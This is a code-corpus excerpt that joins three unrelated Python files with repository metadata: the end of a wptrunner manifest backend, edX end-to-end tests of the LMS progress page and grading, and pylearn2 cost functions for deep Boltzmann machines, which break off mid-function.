def iterkeys(self):
for item in self._flatten().keys():
yield item
def itervalues(self):
for item in self._flatten().values():
yield item
def append(self, child):
child.parent = self
self.children.append(child)
return child
def compile_ast(compiler, ast, data_cls_getter=None, **kwargs):
return compiler().compile(ast,
data_cls_getter=data_cls_getter,
**kwargs)
def compile(compiler, stream, data_cls_getter=None, **kwargs):
return compile_ast(compiler,
parse(stream),
data_cls_getter=data_cls_getter,
**kwargs)
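# A minimal usage sketch (assuming a concrete Compiler subclass, here called
# MyCompiler, that implements the abstract visit_* methods):
#
#     with open("manifest.ini") as f:
#         root = compile(MyCompiler, f)
#     for key, value in root.iteritems():
#         print(key, value)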
|
scheib/chromium
|
third_party/wpt_tools/wpt/tools/wptrunner/wptrunner/wptmanifest/backends/base.py
|
Python
|
bsd-3-clause
| 6,140
|
[
"VisIt"
] |
4348bda803c3aeb6b04a3c371b3c81df911f9ea3fe3842b7962116302c5778f8
|
# -*- coding: utf-8 -*-
"""
End-to-end tests for the LMS that utilize the
progress page.
"""
import ddt
from contextlib import contextmanager
from nose.plugins.attrib import attr
from flaky import flaky
from ..helpers import (
UniqueCourseTest, auto_auth, create_multiple_choice_problem, create_multiple_choice_xml, get_modal_alert
)
from ...fixtures.course import CourseFixture, XBlockFixtureDesc
from ...pages.common.logout import LogoutPage
from ...pages.lms.courseware import CoursewarePage
from ...pages.lms.instructor_dashboard import InstructorDashboardPage, StudentSpecificAdmin
from ...pages.lms.problem import ProblemPage
from ...pages.lms.progress import ProgressPage
from ...pages.studio.component_editor import ComponentEditorView
from ...pages.studio.utils import type_in_codemirror
from ...pages.studio.overview import CourseOutlinePage
class ProgressPageBaseTest(UniqueCourseTest):
"""
Provides utility methods for tests retrieving
scores from the progress page.
"""
USERNAME = "STUDENT_TESTER"
EMAIL = "student101@example.com"
SECTION_NAME = 'Test Section 1'
SUBSECTION_NAME = 'Test Subsection 1'
UNIT_NAME = 'Test Unit 1'
PROBLEM_NAME = 'Test Problem 1'
PROBLEM_NAME_2 = 'Test Problem 2'
def setUp(self):
super(ProgressPageBaseTest, self).setUp()
self.courseware_page = CoursewarePage(self.browser, self.course_id)
self.problem_page = ProblemPage(self.browser) # pylint: disable=attribute-defined-outside-init
self.progress_page = ProgressPage(self.browser, self.course_id)
self.logout_page = LogoutPage(self.browser)
self.course_outline = CourseOutlinePage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
# Install a course with problems
self.course_fix = CourseFixture(
self.course_info['org'],
self.course_info['number'],
self.course_info['run'],
self.course_info['display_name']
)
self.problem1 = create_multiple_choice_problem(self.PROBLEM_NAME)
self.problem2 = create_multiple_choice_problem(self.PROBLEM_NAME_2)
self.course_fix.add_children(
XBlockFixtureDesc('chapter', self.SECTION_NAME).add_children(
XBlockFixtureDesc('sequential', self.SUBSECTION_NAME).add_children(
XBlockFixtureDesc('vertical', self.UNIT_NAME).add_children(self.problem1, self.problem2)
)
),
XBlockFixtureDesc('chapter', "Lab Section").add_children(
XBlockFixtureDesc('sequential', "Lab Subsection").add_children(
XBlockFixtureDesc('vertical', "Lab Unit").add_children(
create_multiple_choice_problem("Lab Exercise")
)
)
)
).install()
# Auto-auth register for the course.
auto_auth(self.browser, self.USERNAME, self.EMAIL, False, self.course_id)
def _answer_problem_correctly(self):
"""
Submit a correct answer to the problem.
"""
self._answer_problem(choice=2)
def _answer_problem(self, choice):
"""
Submit the given choice for the problem.
"""
self.courseware_page.go_to_sequential_position(1)
self.problem_page.click_choice('choice_choice_{}'.format(choice))
self.problem_page.click_submit()
def _get_section_score(self):
"""
        Return the section score tuple from the progress page.
"""
self.progress_page.visit()
return self.progress_page.section_score(self.SECTION_NAME, self.SUBSECTION_NAME)
def _get_problem_scores(self):
"""
Return a list of scores from the progress page.
"""
self.progress_page.visit()
return self.progress_page.scores(self.SECTION_NAME, self.SUBSECTION_NAME)
@contextmanager
def _logged_in_session(self, staff=False):
"""
Ensure that the user is logged in and out appropriately at the beginning
and end of the current test.
"""
self.logout_page.visit()
try:
if staff:
auto_auth(self.browser, "STAFF_TESTER", "staff101@example.com", True, self.course_id)
else:
auto_auth(self.browser, self.USERNAME, self.EMAIL, False, self.course_id)
yield
finally:
self.logout_page.visit()
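    # Typical usage (mirrors the tests below): each interaction is wrapped in
    # this context manager so login state is reset between steps, e.g.
    #     with self._logged_in_session():
    #         self.courseware_page.visit()
    #         self._answer_problem_correctly()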
@attr(shard=9)
@ddt.ddt
class PersistentGradesTest(ProgressPageBaseTest):
"""
Test that grades for completed assessments are persisted
when various edits are made.
"""
def setUp(self):
super(PersistentGradesTest, self).setUp()
self.instructor_dashboard_page = InstructorDashboardPage(self.browser, self.course_id)
def _change_subsection_structure(self):
"""
Adds a unit to the subsection, which
should not affect a persisted subsection grade.
"""
self.course_outline.visit()
subsection = self.course_outline.section(self.SECTION_NAME).subsection(self.SUBSECTION_NAME)
subsection.expand_subsection()
subsection.add_unit()
subsection.publish()
def _set_staff_lock_on_subsection(self, locked):
"""
Sets staff lock for a subsection, which should hide the
subsection score from students on the progress page.
"""
self.course_outline.visit()
subsection = self.course_outline.section_at(0).subsection_at(0)
subsection.set_staff_lock(locked)
self.assertEqual(subsection.has_staff_lock_warning, locked)
def _get_problem_in_studio(self):
"""
Returns the editable problem component in studio,
along with its container unit, so any changes can
be published.
"""
self.course_outline.visit()
self.course_outline.section_at(0).subsection_at(0).expand_subsection()
unit = self.course_outline.section_at(0).subsection_at(0).unit(self.UNIT_NAME).go_to()
component = unit.xblocks[1]
return unit, component
def _change_weight_for_problem(self):
"""
Changes the weight of the problem, which should not affect
persisted grades.
"""
unit, component = self._get_problem_in_studio()
component.edit()
component_editor = ComponentEditorView(self.browser, component.locator)
component_editor.set_field_value_and_save('Problem Weight', 5)
unit.publish()
def _change_correct_answer_for_problem(self, new_correct_choice=1):
"""
Changes the correct answer of the problem.
"""
unit, component = self._get_problem_in_studio()
modal = component.edit()
modified_content = create_multiple_choice_xml(correct_choice=new_correct_choice)
type_in_codemirror(self, 0, modified_content)
modal.q(css='.action-save').click()
unit.publish()
def _student_admin_action_for_problem(self, action_button, has_cancellable_alert=False):
"""
As staff, clicks the "delete student state" button,
deleting the student user's state for the problem.
"""
self.instructor_dashboard_page.visit()
student_admin_section = self.instructor_dashboard_page.select_student_admin(StudentSpecificAdmin)
student_admin_section.set_student_email_or_username(self.USERNAME)
student_admin_section.set_problem_location(self.problem1.locator)
getattr(student_admin_section, action_button).click()
if has_cancellable_alert:
alert = get_modal_alert(student_admin_section.browser)
alert.accept()
alert = get_modal_alert(student_admin_section.browser)
alert.dismiss()
return student_admin_section
def test_progress_page_shows_scored_problems(self):
"""
Checks the progress page before and after answering
the course's first problem correctly.
"""
with self._logged_in_session():
self.assertEqual(self._get_problem_scores(), [(0, 1), (0, 1)])
self.assertEqual(self._get_section_score(), (0, 2))
self.courseware_page.visit()
self._answer_problem_correctly()
self.assertEqual(self._get_problem_scores(), [(1, 1), (0, 1)])
self.assertEqual(self._get_section_score(), (1, 2))
@ddt.data(
_change_correct_answer_for_problem,
_change_subsection_structure,
_change_weight_for_problem
)
@flaky # TODO: fix this, see TNL-6040
def test_content_changes_do_not_change_score(self, edit):
with self._logged_in_session():
self.courseware_page.visit()
self._answer_problem_correctly()
with self._logged_in_session(staff=True):
edit(self)
with self._logged_in_session():
self.assertEqual(self._get_problem_scores(), [(1, 1), (0, 1)])
self.assertEqual(self._get_section_score(), (1, 2))
def test_visibility_change_affects_score(self):
with self._logged_in_session():
self.courseware_page.visit()
self._answer_problem_correctly()
with self._logged_in_session(staff=True):
self._set_staff_lock_on_subsection(True)
with self._logged_in_session():
self.assertEqual(self._get_problem_scores(), None)
self.assertEqual(self._get_section_score(), None)
with self._logged_in_session(staff=True):
self._set_staff_lock_on_subsection(False)
with self._logged_in_session():
self.assertEqual(self._get_problem_scores(), [(1, 1), (0, 1)])
self.assertEqual(self._get_section_score(), (1, 2))
def test_delete_student_state_affects_score(self):
with self._logged_in_session():
self.courseware_page.visit()
self._answer_problem_correctly()
with self._logged_in_session(staff=True):
self._student_admin_action_for_problem('delete_state_button', has_cancellable_alert=True)
with self._logged_in_session():
self.assertEqual(self._get_problem_scores(), [(0, 1), (0, 1)])
self.assertEqual(self._get_section_score(), (0, 2))
@attr(shard=9)
class SubsectionGradingPolicyTest(ProgressPageBaseTest):
"""
Tests changing a subsection's 'graded' field
and the effect it has on the progress page.
"""
def setUp(self):
super(SubsectionGradingPolicyTest, self).setUp()
self._set_policy_for_subsection("Homework", 0)
self._set_policy_for_subsection("Lab", 1)
def _set_policy_for_subsection(self, policy, section=0):
"""
Set the grading policy for the first subsection in the specified section.
If a section index is not provided, 0 is assumed.
"""
with self._logged_in_session(staff=True):
self.course_outline.visit()
modal = self.course_outline.section_at(section).subsection_at(0).edit()
modal.policy = policy
modal.save()
def _check_scores_and_page_text(self, problem_scores, section_score, text):
"""
Asserts that the given problem and section scores, and text,
appear on the progress page.
"""
self.assertEqual(self._get_problem_scores(), problem_scores)
self.assertEqual(self._get_section_score(), section_score)
self.assertTrue(self.progress_page.text_on_page(text))
def _check_tick_text(self, index, sr_text, label, label_hidden=True):
"""
Check the label and sr text for a horizontal (X-axis) tick.
"""
self.assertEqual(sr_text, self.progress_page.x_tick_sr_text(index))
self.assertEqual([label, 'true' if label_hidden else None], self.progress_page.x_tick_label(index))
def test_axis_a11y(self):
"""
Tests that the progress chart axes have appropriate a11y (screenreader) markup.
"""
with self._logged_in_session():
self.courseware_page.visit()
# Answer the first HW problem (the unit contains 2 problems, only one will be answered correctly)
self._answer_problem_correctly()
self.courseware_page.click_next_button_on_top()
# Answer the first Lab problem (unit only contains a single problem)
self._answer_problem_correctly()
self.progress_page.visit()
# Verify that y-Axis labels are aria-hidden
self.assertEqual(['100%', 'true'], self.progress_page.y_tick_label(0))
self.assertEqual(['0%', 'true'], self.progress_page.y_tick_label(1))
self.assertEqual(['Pass 50%', 'true'], self.progress_page.y_tick_label(2))
# Verify x-Axis labels and sr-text
self._check_tick_text(0, [u'Homework 1 - Test Subsection 1 - 50% (1/2)'], u'HW 01')
# Homeworks 2-10 are checked in the for loop below.
self._check_tick_text(
10,
[u'Homework 11 Unreleased - 0% (?/?)', u'The lowest 2 Homework scores are dropped.'],
u'HW 11'
)
self._check_tick_text(
11,
[u'Homework 12 Unreleased - 0% (?/?)', u'The lowest 2 Homework scores are dropped.'],
u'HW 12'
)
self._check_tick_text(12, [u'Homework Average = 5%'], u'HW Avg')
self._check_tick_text(13, [u'Lab 1 - Lab Subsection - 100% (1/1)'], u'Lab 01')
# Labs 2-10 are checked in the for loop below.
self._check_tick_text(
23,
[u'Lab 11 Unreleased - 0% (?/?)', u'The lowest 2 Lab scores are dropped.'],
u'Lab 11'
)
self._check_tick_text(
24,
[u'Lab 12 Unreleased - 0% (?/?)', u'The lowest 2 Lab scores are dropped.'],
u'Lab 12'
)
self._check_tick_text(25, [u'Lab Average = 10%'], u'Lab Avg')
self._check_tick_text(26, [u'Midterm Exam = 0%'], u'Midterm')
self._check_tick_text(27, [u'Final Exam = 0%'], u'Final')
self._check_tick_text(
28,
[u'Homework = 0.75% of a possible 15.00%', u'Lab = 1.50% of a possible 15.00%'],
u'Total',
False # The label "Total" should NOT be aria-hidden
)
# The grading policy has 12 Homeworks and 12 Labs. Most of them are unpublished,
# with no additional information.
for i in range(1, 10):
self._check_tick_text(
i,
[u'Homework {index} Unreleased - 0% (?/?)'.format(index=i + 1)],
u'HW 0{index}'.format(index=i + 1) if i < 9 else u'HW {index}'.format(index=i + 1)
)
self._check_tick_text(
i + 13,
[u'Lab {index} Unreleased - 0% (?/?)'.format(index=i + 1)],
u'Lab 0{index}'.format(index=i + 1) if i < 9 else u'Lab {index}'.format(index=i + 1)
)
# Verify the overall score. The first element in the array is the sr-only text, and the
# second is the total text (including the sr-only text).
self.assertEqual(['Overall Score', 'Overall Score\n2%'], self.progress_page.graph_overall_score())
def test_subsection_grading_policy_on_progress_page(self):
with self._logged_in_session():
self._check_scores_and_page_text([(0, 1), (0, 1)], (0, 2), "Homework 1 - Test Subsection 1 - 0% (0/2)")
self.courseware_page.visit()
self._answer_problem_correctly()
self._check_scores_and_page_text([(1, 1), (0, 1)], (1, 2), "Homework 1 - Test Subsection 1 - 50% (1/2)")
self._set_policy_for_subsection("Not Graded")
with self._logged_in_session():
self.progress_page.visit()
self.assertEqual(self._get_problem_scores(), [(1, 1), (0, 1)])
self.assertEqual(self._get_section_score(), (1, 2))
self.assertFalse(self.progress_page.text_on_page("Homework 1 - Test Subsection 1"))
self._set_policy_for_subsection("Homework")
with self._logged_in_session():
self._check_scores_and_page_text([(1, 1), (0, 1)], (1, 2), "Homework 1 - Test Subsection 1 - 50% (1/2)")
@attr('a11y')
class ProgressPageA11yTest(ProgressPageBaseTest):
"""
Class to test the accessibility of the progress page.
"""
def test_progress_page_a11y(self):
"""
Test the accessibility of the progress page.
"""
self.progress_page.visit()
self.progress_page.a11y_audit.check_for_accessibility_errors()
|
pabloborrego93/edx-platform
|
common/test/acceptance/tests/lms/test_progress_page.py
|
Python
|
agpl-3.0
| 16,933
|
[
"VisIt"
] |
eb5a0d6171d5be954c2537c8e7fdf3cb60c979c724de6f794ff4dc46bef56e63
|
"""
This module contains cost functions to use with deep Boltzmann machines
(pylearn2.models.dbm).
"""
__authors__ = ["Ian Goodfellow", "Vincent Dumoulin"]
__copyright__ = "Copyright 2012, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
import collections
from functools import wraps
import logging
import numpy as np
import operator
import warnings
from theano.compat.six.moves import reduce, xrange
from theano import config
from theano.sandbox.rng_mrg import MRG_RandomStreams
RandomStreams = MRG_RandomStreams
from theano import tensor as T
import pylearn2
from pylearn2.compat import OrderedDict
from pylearn2.costs.cost import Cost
from pylearn2.costs.cost import (
FixedVarDescr, DefaultDataSpecsMixin, NullDataSpecsMixin
)
from pylearn2.models import dbm
from pylearn2.models.dbm import BinaryVectorMaxPool
from pylearn2.models.dbm import flatten
from pylearn2.models.dbm.layer import BinaryVector
from pylearn2.models.dbm import Softmax
from pylearn2 import utils
from pylearn2.utils import make_name
from pylearn2.utils import safe_izip
from pylearn2.utils import safe_zip
from pylearn2.utils import sharedX
from pylearn2.utils.rng import make_theano_rng
logger = logging.getLogger(__name__)
class BaseCD(Cost):
"""
Parameters
----------
num_chains : int
The number of negative chains to use with PCD / SML.
WRITEME : how is this meant to be used with CD? Do you just need to
set it to be equal to the batch size? If so: TODO, get rid of this
redundant aspect of the interface.
num_gibbs_steps : int
The number of Gibbs steps to use in the negative phase. (i.e., if
you want to use CD-k or PCD-k, this is "k").
supervised : bool
        If True, requests class labels and models the joint distribution over
features and labels.
toronto_neg : bool
If True, use a bit of mean field in the negative phase.
Ruslan Salakhutdinov's matlab code does this.
theano_rng : MRG_RandomStreams, optional
If specified, uses this object to generate all random numbers.
Otherwise, makes its own random number generator.
"""
def __init__(self, num_chains, num_gibbs_steps, supervised=False,
toronto_neg=False, theano_rng=None):
self.__dict__.update(locals())
del self.self
self.theano_rng = make_theano_rng(theano_rng, 2012 + 10 + 14,
which_method="binomial")
assert supervised in [True, False]
def expr(self, model, data):
"""
The partition function makes this intractable.
Parameters
----------
model : DBM
data : Batch in get_data_specs format
"""
self.get_data_specs(model)[0].validate(data)
return None
@wraps(Cost.get_monitoring_channels)
def get_monitoring_channels(self, model, data):
self.get_data_specs(model)[0].validate(data)
rval = OrderedDict()
if self.supervised:
X, Y = data
else:
X = data
Y = None
history = model.mf(X, return_history=True)
q = history[-1]
if self.supervised:
assert len(data) == 2
Y_hat = q[-1]
true = T.argmax(Y, axis=1)
pred = T.argmax(Y_hat, axis=1)
# true = Print('true')(true)
# pred = Print('pred')(pred)
wrong = T.neq(true, pred)
err = T.cast(wrong.mean(), X.dtype)
rval['misclass'] = err
if len(model.hidden_layers) > 1:
q = model.mf(X, Y=Y)
pen = model.hidden_layers[-2].upward_state(q[-2])
Y_recons = model.hidden_layers[-1].mf_update(state_below=pen)
pred = T.argmax(Y_recons, axis=1)
wrong = T.neq(true, pred)
rval['recons_misclass'] = T.cast(wrong.mean(), X.dtype)
return rval
@wraps(Cost.get_gradients)
def get_gradients(self, model, data):
self.get_data_specs(model)[0].validate(data)
if self.supervised:
X, Y = data
assert Y is not None
else:
X = data
Y = None
pos_phase_grads, pos_updates = self._get_positive_phase(model, X, Y)
neg_phase_grads, neg_updates = self._get_negative_phase(model, X, Y)
updates = OrderedDict()
for key, val in pos_updates.items():
updates[key] = val
for key, val in neg_updates.items():
updates[key] = val
gradients = OrderedDict()
for param in list(pos_phase_grads.keys()):
gradients[param] = neg_phase_grads[param] + pos_phase_grads[param]
return gradients, updates
def _get_toronto_neg(self, model, layer_to_chains):
"""
.. todo::
WRITEME
"""
# Ruslan Salakhutdinov's undocumented negative phase from
# http://www.mit.edu/~rsalakhu/code_DBM/dbm_mf.m
# IG copied it here without fully understanding it, so it
# only applies to exactly the same model structure as
# in that code.
assert isinstance(model.visible_layer, BinaryVector)
assert isinstance(model.hidden_layers[0], BinaryVectorMaxPool)
assert model.hidden_layers[0].pool_size == 1
assert isinstance(model.hidden_layers[1], BinaryVectorMaxPool)
assert model.hidden_layers[1].pool_size == 1
assert isinstance(model.hidden_layers[2], Softmax)
assert len(model.hidden_layers) == 3
params = list(model.get_params())
V_samples = layer_to_chains[model.visible_layer]
H1_samples, H2_samples, Y_samples = [layer_to_chains[layer] for
layer in model.hidden_layers]
H1_mf = model.hidden_layers[0].mf_update(
state_below=model.visible_layer.upward_state(V_samples),
state_above=model.hidden_layers[1].downward_state(H2_samples),
layer_above=model.hidden_layers[1])
Y_mf = model.hidden_layers[2].mf_update(
state_below=model.hidden_layers[1].upward_state(H2_samples))
H2_mf = model.hidden_layers[1].mf_update(
state_below=model.hidden_layers[0].upward_state(H1_mf),
state_above=model.hidden_layers[2].downward_state(Y_mf),
layer_above=model.hidden_layers[2])
expected_energy_p = model.energy(
V_samples, [H1_mf, H2_mf, Y_samples]
).mean()
constants = flatten([V_samples, H1_mf, H2_mf, Y_samples])
neg_phase_grads = OrderedDict(
safe_zip(params, T.grad(-expected_energy_p, params,
consider_constant=constants)))
return neg_phase_grads
def _get_standard_neg(self, model, layer_to_chains):
"""
.. todo::
WRITEME
        TODO: reduce variance of the negative phase by
integrating out the even-numbered layers. The
Rao-Blackwellize method can do this for you when
expected gradient = gradient of expectation, but
doing this in general is trickier.
"""
params = list(model.get_params())
# layer_to_chains = model.rao_blackwellize(layer_to_chains)
expected_energy_p = model.energy(
layer_to_chains[model.visible_layer],
[layer_to_chains[layer] for layer in model.hidden_layers]
).mean()
samples = flatten(layer_to_chains.values())
for i, sample in enumerate(samples):
if sample.name is None:
sample.name = 'sample_' + str(i)
neg_phase_grads = OrderedDict(
safe_zip(params, T.grad(-expected_energy_p, params,
consider_constant=samples,
disconnected_inputs='ignore'))
)
return neg_phase_grads
def _get_variational_pos(self, model, X, Y):
"""
.. todo::
WRITEME
"""
if self.supervised:
assert Y is not None
# note: if the Y layer changes to something without linear energy,
# we'll need to make the expected energy clamp Y in the positive
# phase
assert isinstance(model.hidden_layers[-1], Softmax)
q = model.mf(X, Y)
"""
Use the non-negativity of the KL divergence to construct a lower
bound on the log likelihood. We can drop all terms that are
        constant with respect to the model parameters:
log P(v) = L(v, q) + KL(q || P(h|v))
L(v, q) = log P(v) - KL(q || P(h|v))
L(v, q) = log P(v) - sum_h q(h) log q(h) + q(h) log P(h | v)
L(v, q) = log P(v) + sum_h q(h) log P(h | v) + const
L(v, q) = log P(v) + sum_h q(h) log P(h, v)
- sum_h q(h) log P(v) + const
L(v, q) = sum_h q(h) log P(h, v) + const
L(v, q) = sum_h q(h) -E(h, v) - log Z + const
so the cost we want to minimize is
expected_energy + log Z + const
Note: for the RBM, this bound is exact, since the KL divergence
goes to 0.
"""
variational_params = flatten(q)
# The gradients of the expected energy under q are easy, we can just
# do that in theano
expected_energy_q = model.expected_energy(X, q).mean()
params = list(model.get_params())
gradients = OrderedDict(
safe_zip(params, T.grad(expected_energy_q,
params,
consider_constant=variational_params,
disconnected_inputs='ignore'))
)
return gradients
def _get_sampling_pos(self, model, X, Y):
"""
.. todo::
WRITEME
"""
layer_to_clamp = OrderedDict([(model.visible_layer, True)])
layer_to_pos_samples = OrderedDict([(model.visible_layer, X)])
if self.supervised:
# note: if the Y layer changes to something without linear energy,
# we'll need to make the expected energy clamp Y in the
# positive phase
assert isinstance(model.hidden_layers[-1], Softmax)
layer_to_clamp[model.hidden_layers[-1]] = True
layer_to_pos_samples[model.hidden_layers[-1]] = Y
hid = model.hidden_layers[:-1]
else:
assert Y is None
hid = model.hidden_layers
for layer in hid:
mf_state = layer.init_mf_state()
def recurse_zeros(x):
if isinstance(x, tuple):
return tuple([recurse_zeros(e) for e in x])
return x.zeros_like()
layer_to_pos_samples[layer] = recurse_zeros(mf_state)
layer_to_pos_samples = model.sampling_procedure.sample(
layer_to_state=layer_to_pos_samples,
layer_to_clamp=layer_to_clamp,
num_steps=self.num_gibbs_steps,
theano_rng=self.theano_rng)
q = [layer_to_pos_samples[layer] for layer in model.hidden_layers]
pos_samples = flatten(q)
# The gradients of the expected energy under q are easy, we can just
# do that in theano
expected_energy_q = model.energy(X, q).mean()
params = list(model.get_params())
gradients = OrderedDict(
safe_zip(params, T.grad(expected_energy_q, params,
consider_constant=pos_samples,
disconnected_inputs='ignore'))
)
return gradients
class PCD(DefaultDataSpecsMixin, BaseCD):
"""
An intractable cost representing the negative log likelihood of a DBM.
    The gradient of this cost is approximated using a persistent
    Markov chain.
TODO add citation to Tieleman paper, Younes paper
Parameters
----------
Same as BaseCD
See Also
--------
BaseCD : The base class of this class (where the constructor
parameters are documented)
"""
def _get_positive_phase(self, model, X, Y=None):
"""
Computes the positive phase using Gibbs sampling.
Returns
-------
gradients : OrderedDict
A dictionary mapping parameters to positive phase gradients.
updates : OrderedDict
An empty dictionary
"""
return self._get_sampling_pos(model, X, Y), OrderedDict()
def _get_negative_phase(self, model, X, Y=None):
"""
.. todo::
WRITEME
"""
layer_to_chains = model.make_layer_to_state(self.num_chains)
def recurse_check(l):
if isinstance(l, (list, tuple, collections.ValuesView)):
for elem in l:
recurse_check(elem)
else:
assert l.get_value().shape[0] == self.num_chains
recurse_check(layer_to_chains.values())
model.layer_to_chains = layer_to_chains
# Note that we replace layer_to_chains with a dict mapping to the new
# state of the chains
updates, layer_to_chains = model.get_sampling_updates(
layer_to_chains, self.theano_rng, num_steps=self.num_gibbs_steps,
return_layer_to_updated=True)
if self.toronto_neg:
neg_phase_grads = self._get_toronto_neg(model, layer_to_chains)
else:
neg_phase_grads = self._get_standard_neg(model, layer_to_chains)
return neg_phase_grads, updates
class VariationalPCD(DefaultDataSpecsMixin, BaseCD):
"""
An intractable cost representing the variational upper bound
on the negative log likelihood of a DBM.
The gradient of this bound is computed using a persistent
    Markov chain.
TODO add citation to Tieleman paper, Younes paper
Parameters
----------
Same as BaseCD.
See Also
--------
BaseCD : The base class of this class (where the constructor
parameters are documented)
"""
def expr(self, model, data):
"""
The partition function makes this intractable.
Parameters
----------
model : Model
data : Minibatch in get_data_specs format
Returns
-------
None : (Always returns None)
"""
self.get_data_specs(model)[0].validate(data)
return None
def _get_positive_phase(self, model, X, Y=None):
"""
.. todo::
WRITEME
"""
return self._get_variational_pos(model, X, Y), OrderedDict()
def _get_negative_phase(self, model, X, Y=None):
"""
.. todo::
WRITEME
d/d theta log Z = (d/d theta Z) / Z
= (d/d theta sum_h sum_v exp(-E(v,h)) ) / Z
= (sum_h sum_v - exp(-E(v,h)) d/d theta E(v,h) ) / Z
= - sum_h sum_v P(v,h) d/d theta E(v,h)
"""
layer_to_chains = model.make_layer_to_state(self.num_chains)
def recurse_check(l):
if isinstance(l, (list, tuple)):
for elem in l:
recurse_check(elem)
else:
assert l.get_value().shape[0] == self.num_chains
recurse_check(layer_to_chains.values())
model.layer_to_chains = layer_to_chains
# Note that we replace layer_to_chains with a dict mapping to the new
# state of the chains
updates, layer_to_chains = model.get_sampling_updates(
layer_to_chains,
self.theano_rng, num_steps=self.num_gibbs_steps,
return_layer_to_updated=True)
if self.toronto_neg:
neg_phase_grads = self._get_toronto_neg(model, layer_to_chains)
else:
neg_phase_grads = self._get_standard_neg(model, layer_to_chains)
return neg_phase_grads, updates
class VariationalPCD_VarianceReduction(DefaultDataSpecsMixin, Cost):
"""
    Like pylearn2.costs.dbm.VariationalPCD (essentially a copy of it),
but with a variance reduction rule hard-coded for 2 binary
hidden layers and a softmax label layer
The variance reduction rule used here is to average together the expected
energy you get by integrating out the odd numbered layers and the
expected energy you get by integrating out the even numbered layers.
This is the most "textbook correct" implementation of the negative
    phase, though not the one that works best in practice ("toronto_neg").
Parameters
----------
num_chains : int
Number of negative chains to use
num_gibbs_steps : int
Number of Gibbs steps to use for each gradient calculation
supervised : bool
If True, calculates gradient of log P(X, Y), otherwise just
log P(X)
"""
def __init__(self, num_chains, num_gibbs_steps, supervised=False):
"""
"""
self.__dict__.update(locals())
del self.self
self.theano_rng = MRG_RandomStreams(2012 + 10 + 14)
assert supervised in [True, False]
def expr(self, model, data):
"""
The partition function makes this intractable.
Parameters
----------
model : Model
data : Batch in get_data_specs format
Returns
-------
None : (always returns None because it's intractable)
"""
if self.supervised:
X, Y = data
assert Y is not None
return None
@wraps(Cost.get_monitoring_channels)
def get_monitoring_channels(self, model, data):
rval = OrderedDict()
if self.supervised:
X, Y = data
else:
X = data
Y = None
history = model.mf(X, return_history=True)
q = history[-1]
if self.supervised:
assert Y is not None
Y_hat = q[-1]
true = T.argmax(Y, axis=1)
pred = T.argmax(Y_hat, axis=1)
# true = Print('true')(true)
# pred = Print('pred')(pred)
wrong = T.neq(true, pred)
err = T.cast(wrong.mean(), X.dtype)
rval['misclass'] = err
if len(model.hidden_layers) > 1:
q = model.mf(X, Y=Y)
pen = model.hidden_layers[-2].upward_state(q[-2])
Y_recons = model.hidden_layers[-1].mf_update(state_below=pen)
pred = T.argmax(Y_recons, axis=1)
wrong = T.neq(true, pred)
rval['recons_misclass'] = T.cast(wrong.mean(), X.dtype)
return rval
def get_gradients(self, model, data):
"""
PCD approximation to the gradient of the bound.
Keep in mind this is a cost, so we are upper bounding
the negative log likelihood.
Parameters
----------
model : DBM
data : Batch in get_data_specs_format
Returns
-------
grads : OrderedDict
Dictionary mapping from parameters to (approximate) gradients
updates : OrderedDict
Dictionary containing the Gibbs sampling updates used to
maintain the Markov chain used for PCD
"""
if self.supervised:
X, Y = data
assert Y is not None
# note: if the Y layer changes to something without linear energy,
# we'll need to make the expected energy clamp Y in the positive
# phase
assert isinstance(model.hidden_layers[-1], dbm.Softmax)
else:
X = data
Y = None
q = model.mf(X, Y)
"""
Use the non-negativity of the KL divergence to construct a lower bound
on the log likelihood. We can drop all terms that are constant with
respect to the model parameters:
log P(v) = L(v, q) + KL(q || P(h|v))
L(v, q) = log P(v) - KL(q || P(h|v))
L(v, q) = log P(v) - sum_h q(h) log q(h) + q(h) log P(h | v)
L(v, q) = log P(v) + sum_h q(h) log P(h | v) + const
L(v, q) = log P(v) + sum_h q(h) log P(h, v) - sum_h q(h) log P(v) + C
L(v, q) = sum_h q(h) log P(h, v) + C
L(v, q) = sum_h q(h) - E(h, v) - log Z + C
so the cost we want to minimize is
expected_energy + log Z + C
Note: for the RBM, this bound is exact, since the KL divergence
goes to 0.
"""
variational_params = flatten(q)
# The gradients of the expected energy under q are easy, we can just
# do that in theano
expected_energy_q = model.expected_energy(X, q).mean()
params = list(model.get_params())
grads = T.grad(expected_energy_q, params,
consider_constant=variational_params,
disconnected_inputs='ignore')
gradients = OrderedDict(safe_zip(params, grads))
"""
d/d theta log Z = (d/d theta Z) / Z
= (d/d theta sum_h sum_v exp(-E(v,h)) ) / Z
= (sum_h sum_v - exp(-E(v,h)) d/d theta E(v,h) ) / Z
= - sum_h sum_v P(v,h) d/d theta E(v,h)
"""
layer_to_chains = model.make_layer_to_state(self.num_chains)
def recurse_check(l):
if isinstance(l, (list, tuple)):
for elem in l:
recurse_check(elem)
else:
assert l.get_value().shape[0] == self.num_chains
recurse_check(layer_to_chains.values())
model.layer_to_chains = layer_to_chains
# Note that we replace layer_to_chains with a dict mapping to the new
# state of the chains
gsu = model.get_sampling_updates
updates, layer_to_chains = gsu(layer_to_chains, self.theano_rng,
num_steps=self.num_gibbs_steps,
return_layer_to_updated=True)
# Variance reduction is hardcoded for this exact model
assert isinstance(model.visible_layer, dbm.BinaryVector)
assert isinstance(model.hidden_layers[0], dbm.BinaryVectorMaxPool)
assert model.hidden_layers[0].pool_size == 1
assert isinstance(model.hidden_layers[1], dbm.BinaryVectorMaxPool)
assert model.hidden_layers[1].pool_size == 1
assert isinstance(model.hidden_layers[2], dbm.Softmax)
assert len(model.hidden_layers) == 3
V_samples = layer_to_chains[model.visible_layer]
H1_samples, H2_samples, Y_samples = [layer_to_chains[layer] for layer
in model.hidden_layers]
sa = model.hidden_layers[0].downward_state(H1_samples)
V_mf = model.visible_layer.inpaint_update(layer_above=
model.hidden_layers[0],
state_above=sa)
f = model.hidden_layers[0].mf_update
sb = model.visible_layer.upward_state(V_samples)
sa = model.hidden_layers[1].downward_state(H2_samples)
H1_mf = f(state_below=sb, state_above=sa,
layer_above=model.hidden_layers[1])
f = model.hidden_layers[1].mf_update
sb = model.hidden_layers[0].upward_state(H1_samples)
sa = model.hidden_layers[2].downward_state(Y_samples)
H2_mf = f(state_below=sb,
state_above=sa,
layer_above=model.hidden_layers[2])
sb = model.hidden_layers[1].upward_state(H2_samples)
Y_mf = model.hidden_layers[2].mf_update(state_below=sb)
